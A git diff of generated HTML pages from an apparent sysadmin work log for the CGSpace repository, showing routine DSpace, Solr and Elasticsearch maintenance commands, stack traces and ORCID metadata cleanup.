                                                    +
                                                    • I filed a bug on Atmire’s issue tracker
                                                    • Peter asked me to move the CGIAR Gender Platform community to the top level of CGSpace, but I get an error when I use the community-filiator command:
                                                    -
                                                    $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                    -Loading @mire database changes for module MQM
                                                    -Changes have been processed
                                                    -Exception: null
                                                    -java.lang.UnsupportedOperationException
                                                    -        at java.util.AbstractList.remove(AbstractList.java:161)
                                                    -        at java.util.AbstractList$Itr.remove(AbstractList.java:374)
                                                    -        at java.util.AbstractCollection.remove(AbstractCollection.java:293)
                                                    -        at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
                                                    -        at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
                                                    -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                    -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                    -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                    -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                    -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                    -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                    -
                                                      +
                                                      $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                      +Loading @mire database changes for module MQM
                                                      +Changes have been processed
                                                      +Exception: null
                                                      +java.lang.UnsupportedOperationException
                                                      +        at java.util.AbstractList.remove(AbstractList.java:161)
                                                      +        at java.util.AbstractList$Itr.remove(AbstractList.java:374)
                                                      +        at java.util.AbstractCollection.remove(AbstractCollection.java:293)
                                                      +        at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
                                                      +        at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
                                                      +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                      +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                      +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                      +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                      +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                      +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                      +
                                                      • There is apparently a bug in DSpace 6.x that makes community-filiator not work
                                                        • There is a patch for the as-of-yet unreleased DSpace 6.4 so I will try that
                                                        • @@ -301,24 +301,24 @@ java.lang.UnsupportedOperationException
                                                      -
                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                      -# start indexing in AReS
                                                      -... after ten hours
                                                      -$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                      -{
                                                      -  "count" : 100411,
                                                      -  "_shards" : {
                                                      -    "total" : 1,
                                                      -    "successful" : 1,
                                                      -    "skipped" : 0,
                                                      -    "failed" : 0
                                                      -  }
                                                      -}
                                                      -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                      -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                      -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                      -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                      -
                                                        +
                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                        +# start indexing in AReS
                                                        +... after ten hours
                                                        +$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                        +{
                                                        +  "count" : 100411,
                                                        +  "_shards" : {
                                                        +    "total" : 1,
                                                        +    "successful" : 1,
                                                        +    "skipped" : 0,
                                                        +    "failed" : 0
                                                        +  }
                                                        +}
                                                        +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                        +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                        +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                        +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                        +
                                                        • Looking over the last month of Solr stats I see a familiar bot that should have been marked as a bot months ago:
                                                        @@ -331,9 +331,9 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                    -
                                                    $ cat log/dspace.log.2020-12-2* | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71' | sort | uniq | wc -l
                                                    -0
                                                    -
                                                      +
                                                      $ cat log/dspace.log.2020-12-2* | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71' | sort | uniq | wc -l
                                                      +0
                                                      +
                                                      • So now I should really add it to the DSpace spider agent list so it doesn’t create Solr hits
                                                        • I added it to the “ilri” lists of spider agent patterns
                                                        • @@ -341,8 +341,8 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                        • I purged the existing hits using my check-spider-ip-hits.sh script:
                                                        -
                                                        $ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
                                                        -

                                                        2021-01-11

                                                        +
                                                        $ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
                                                        +

                                                        2021-01-11

                                                        • The AReS indexing finished this morning and I moved the openrxv-items-temp core to openrxv-items (see above)
                                                            @@ -351,8 +351,8 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                          • I deployed the community-filiator fix on CGSpace and moved the Gender Platform community to the top level of CGSpace:
                                                          -
                                                          $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                          -

                                                          2021-01-12

                                                          +
                                                          $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                          +

                                                          2021-01-12

                                                          • IWMI is really pressuring us to have a periodic CSV export of their community
                                                              @@ -393,29 +393,29 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                          -
                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                          -# start indexing in AReS
                                                          -
                                                            +
                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            +# start indexing in AReS
                                                            +
                                                            • Then, the next morning when it’s done, check the results of the harvesting, backup the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
                                                            -
                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                            -{
                                                            -  "count" : 100540,
                                                            -  "_shards" : {
                                                            -    "total" : 1,
                                                            -    "successful" : 1,
                                                            -    "skipped" : 0,
                                                            -    "failed" : 0
                                                            -  }
                                                            -}
                                                            -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                            -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-18'
                                                            -

                                                            2021-01-18

                                                            +
                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                            +{
                                                            +  "count" : 100540,
                                                            +  "_shards" : {
                                                            +    "total" : 1,
                                                            +    "successful" : 1,
                                                            +    "skipped" : 0,
                                                            +    "failed" : 0
                                                            +  }
                                                            +}
                                                            +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                            +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-18'
                                                            +

                                                            2021-01-18

                                                            • Finish the indexing on AReS that I started yesterday
                                                            • Udana from IWMI emailed me to ask why the iwmi.csv doesn’t include items he approved to CGSpace this morning @@ -462,9 +462,9 @@ localhost/dspace63= > COMMIT;
                                                          -
                                                          $ docker exec -it api /bin/bash
                                                          -# apt update && apt install unoconv
                                                          -
                                                            +
                                                            $ docker exec -it api /bin/bash
                                                            +# apt update && apt install unoconv
                                                            +
                                                            • Help Peter get a list of titles and DOIs for CGSpace items that Altmetric does not have an attention score for
                                                              • He generated a list from their dashboard and I extracted the DOIs in OpenRefine (because it was WINDOWS-1252 and csvcut couldn’t do it)
                                                              • @@ -512,30 +512,30 @@ localhost/dspace63= > COMMIT;
                                                            -
                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            -# start indexing in AReS
                                                            -
                                                              +
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                              +# start indexing in AReS
                                                              +
                                                              • Then, the next morning when it’s done, check the results of the harvesting, backup the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
                                                              -
                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                              -{
                                                              -  "count" : 100699,
                                                              -  "_shards" : {
                                                              -    "total" : 1,
                                                              -    "successful" : 1,
                                                              -    "skipped" : 0,
                                                              -    "failed" : 0
                                                              -  }
                                                              -}
                                                              -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.b
                                                              -locks.write":true}}'
                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                              -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-25'
                                                              -
                                                                +
                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                +{
                                                                +  "count" : 100699,
                                                                +  "_shards" : {
                                                                +    "total" : 1,
                                                                +    "successful" : 1,
                                                                +    "skipped" : 0,
                                                                +    "failed" : 0
                                                                +  }
                                                                +}
                                                                +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.b
                                                                +locks.write":true}}'
                                                                +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-25'
                                                                +
                                                                • Resume working on CG Core v2, I realized a few things:
                                                                  • We are trying to move from dc.identifier.issn (and ISBN) to cg.issn, but this is currently implemented as a “qualdrop” input in DSpace’s submission form, which only works to fill in the qualifier (ie dc.identier.xxxx) @@ -601,12 +601,12 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
                                                                  • I filed a bug on DSpace’s issue tracker (though I accidentally hit Enter and submitted it before I finished, and there is no edit function)
                                                                  • Looking into Linode report that the load outbound traffic rate was high this morning:
                                                                  -
                                                                  # grep -E '26/Jan/2021:(08|09|10|11|12)' /var/log/nginx/rest.log | goaccess --log-format=COMBINED -
                                                                  -
                                                                    +
                                                                    # grep -E '26/Jan/2021:(08|09|10|11|12)' /var/log/nginx/rest.log | goaccess --log-format=COMBINED -
                                                                    +
                                                                    • The culprit seems to be the ILRI publications importer, so that’s OK
                                                                    • But I also see an IP in Jordan hitting the REST API 1,100 times today:
                                                                    -
                                                                    80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] "GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0" 302 138 "http://wp.local/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
                                                                    +
                                                                    80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] "GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0" 302 138 "http://wp.local/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
                                                                     
                                                                    • Seems to be someone from CodeObia working on WordPress
                                                                        @@ -615,8 +615,8 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
                                                                      • I purged all ~3,000 statistics hits that have the “http://wp.local/" referrer:
                                                                      -
                                                                      $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>referrer:http\:\/\/wp\.local\/</query></delete>"
                                                                      -
                                                                        +
                                                                        $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>referrer:http\:\/\/wp\.local\/</query></delete>"
                                                                        +
                                                                        -
                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                        -# start indexing in AReS
                                                                        -
                                                                          +
                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                          +# start indexing in AReS
                                                                          +
                                                                          • Sent out emails about CG Core v2 to Macaroni Bros, Fabio, Hector at CCAFS, Dani and Tariku
                                                                          • A bit more minor work on testing the series/report/journal changes for CG Core v2
                                                                          diff --git a/docs/2021-02/index.html b/docs/2021-02/index.html index 45f8efdfd..8236191c1 100644 --- a/docs/2021-02/index.html +++ b/docs/2021-02/index.html @@ -60,7 +60,7 @@ $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty } } "/> - + @@ -157,34 +157,34 @@ $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty
                                                                        • I had a call with CodeObia to discuss the work on OpenRXV
                                                                        • Check the results of the AReS harvesting from last night:
                                                                        -
                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                        -{
                                                                        -  "count" : 100875,
                                                                        -  "_shards" : {
                                                                        -    "total" : 1,
                                                                        -    "successful" : 1,
                                                                        -    "skipped" : 0,
                                                                        -    "failed" : 0
                                                                        -  }
                                                                        -}
                                                                        -
                                                                          +
                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                          +{
                                                                          +  "count" : 100875,
                                                                          +  "_shards" : {
                                                                          +    "total" : 1,
                                                                          +    "successful" : 1,
                                                                          +    "skipped" : 0,
                                                                          +    "failed" : 0
                                                                          +  }
                                                                          +}
                                                                          +
                                                                          • Set the current items index to read only and make a backup:
                                                                          -
                                                                          $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
                                                                          -
                                                                            +
                                                                            $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
                                                                            +
                                                                            • Delete the current items index and clone the temp one to it:
                                                                            -
                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                            -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                            -
                                                                              +
                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                              +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                              +
                                                                              • Then delete the temp and backup:
                                                                              -
                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                              -{"acknowledged":true}%
                                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-01'
                                                                              -
                                                                                +
                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                +{"acknowledged":true}%
                                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-01'
                                                                                +
                                                                                • Meeting with Peter and Abenet about CGSpace goals and progress
                                                                                • Test submission to DSpace via REST API to see if Abenet can fix / reject it (submit workflow?)
                                                                                • Get Peter a list of users who have submitted or approved on DSpace everrrrrrr, so he can remove some
                                                                                • @@ -196,25 +196,25 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                                • I tried to export the ILRI community from CGSpace but I got an error:
                                                                                -
                                                                                $ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
                                                                                -Loading @mire database changes for module MQM
                                                                                -Changes have been processed
                                                                                -Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                                                -           Exception: null
                                                                                -java.lang.NullPointerException
                                                                                -        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                                                -        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                -
                                                                                  +
                                                                                  $ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
                                                                                  +Loading @mire database changes for module MQM
                                                                                  +Changes have been processed
                                                                                  +Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                                                  +           Exception: null
                                                                                  +java.lang.NullPointerException
                                                                                  +        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                                                  +        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                  +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                  +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                  +
                                                                                  • I imported the production database to my local development environment and I get the same error… WTF is this?
                                                                                    • I was able to export another smaller community
                                                                                    • @@ -234,28 +234,28 @@ java.lang.NullPointerException
                                                                                    • Maria Garruccio sent me some new ORCID iDs for Bioversity authors, as well as a correction for Stefan Burkart’s iD
                                                                                    • I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using resolve-orcids.py:
                                                                                    -
                                                                                    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-02-02-combined-orcids.txt
                                                                                    -$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
                                                                                    -
                                                                                      +
                                                                                      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-02-02-combined-orcids.txt
                                                                                      +$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
                                                                                      +
                                                                                      • I sorted the names and added the XML formatting in vim, then ran it through tidy:
                                                                                      -
                                                                                      $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
                                                                                      -
                                                                                        +
                                                                                        $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
                                                                                        +
                                                                                        • Then I added all the changed names plus Stefan’s incorrect ones to a CSV and processed them with fix-metadata-values.py:
                                                                                        -
                                                                                        $ cat 2021-02-02-fix-orcid-ids.csv 
                                                                                        -cg.creator.id,correct
                                                                                        -Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Stefan  Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
                                                                                        -Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
                                                                                        -Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
                                                                                        -Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
                                                                                        -saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
                                                                                        -$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p 'fuuu' -f cg.creator.id -t 'correct' -m 240
                                                                                        -
                                                                                          +
                                                                                          $ cat 2021-02-02-fix-orcid-ids.csv 
                                                                                          +cg.creator.id,correct
                                                                                          +Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Stefan  Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
                                                                                          +Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
                                                                                          +Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
                                                                                          +Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
                                                                                          +saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
                                                                                          +$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p 'fuuu' -f cg.creator.id -t 'correct' -m 240
                                                                                          +
                                                                                          • I also looked up which of these new authors might have existing items that are missing ORCID iDs
                                                                                          • I had to port my add-orcid-identifiers-csv.py to DSpace 6 UUIDs and I think it’s working but I want to do a few more tests because it uses a sequence for the metadata_value_id
                                                                                          @@ -263,23 +263,23 @@ $ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u
                                                                                          • Tag forty-three items from Bioversity’s new authors with ORCID iDs using add-orcid-identifiers-csv.py:
                                                                                          -
                                                                                          $ cat /tmp/2021-02-02-add-orcid-ids.csv
                                                                                          -dc.contributor.author,cg.creator.id
                                                                                          -"Nchanji, E.",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                          -"Nchanji, Eileen",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                          -"Nchanji, Eileen Bogweh",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                          -"Machida, Lewis",Lewis Machida: 0000-0002-0012-3997
                                                                                          -"Mockshell, Jonathan",Jonathan Mockshell: 0000-0003-1990-6657"
                                                                                          -"Aubert, C.",Celine Aubert: 0000-0001-6284-4821
                                                                                          -"Aubert, Céline",Celine Aubert: 0000-0001-6284-4821
                                                                                          -"Devare, M.",Medha Devare: 0000-0003-0041-4812
                                                                                          -"Devare, Medha",Medha Devare: 0000-0003-0041-4812
                                                                                          -"Benites-Alfaro, O.E.",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                          -"Benites-Alfaro, Omar Eduardo",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                          -"Johnson, Vincent",VINCENT JOHNSON: 0000-0001-7874-178X
                                                                                          -"Lesueur, Didier",didier lesueur: 0000-0002-6694-0869
                                                                                          -$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                          -
                                                                                            +
                                                                                            $ cat /tmp/2021-02-02-add-orcid-ids.csv
                                                                                            +dc.contributor.author,cg.creator.id
                                                                                            +"Nchanji, E.",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                            +"Nchanji, Eileen",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                            +"Nchanji, Eileen Bogweh",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                            +"Machida, Lewis",Lewis Machida: 0000-0002-0012-3997
                                                                                            +"Mockshell, Jonathan",Jonathan Mockshell: 0000-0003-1990-6657"
                                                                                            +"Aubert, C.",Celine Aubert: 0000-0001-6284-4821
                                                                                            +"Aubert, Céline",Celine Aubert: 0000-0001-6284-4821
                                                                                            +"Devare, M.",Medha Devare: 0000-0003-0041-4812
                                                                                            +"Devare, Medha",Medha Devare: 0000-0003-0041-4812
                                                                                            +"Benites-Alfaro, O.E.",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                            +"Benites-Alfaro, Omar Eduardo",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                            +"Johnson, Vincent",VINCENT JOHNSON: 0000-0001-7874-178X
                                                                                            +"Lesueur, Didier",didier lesueur: 0000-0002-6694-0869
                                                                                            +$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                            +
                                                                                            • I’m working on the CGSpace accession for Karl Rich’s Viet Nam Pig Model 2018 and I noticed his ORCID iD is missing from CGSpace
                                                                                              • I added it and tagged 141 items of his with the iD
                                                                                              • @@ -300,9 +300,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db d
                                                                                            -
                                                                                            $ time chrt -b 0 dspace index-discovery -b
                                                                                            -$ dspace oai import -c
                                                                                            -
                                                                                              +
                                                                                              $ time chrt -b 0 dspace index-discovery -b
                                                                                              +$ dspace oai import -c
                                                                                              +
                                                                                              • Attend Accenture meeting for repository managers
                                                                                                • Not clear what the SMO wants to get out of us
                                                                                                • @@ -333,8 +333,8 @@ $ dspace oai import -c
                                                                                              -
                                                                                              $ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -m 43
                                                                                              -
                                                                                                +
                                                                                                $ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -m 43
                                                                                                +
                                                                                                • The corrected versions have a lot of encoding issues so I asked Peter to give me the correct ones so I can search/replace them:
                                                                                                  • CIAT Publicaçao
                                                                                                  • @@ -358,8 +358,8 @@ $ dspace oai import -c
                                                                                                  • I ended up using python-ftfy to fix those very easily, then replaced them in the CSV
                                                                                                  • Then I trimmed whitespace at the beginning, end, and around the “;”, and applied the 1,600 fixes using fix-metadata-values.py:
                                                                                                  -
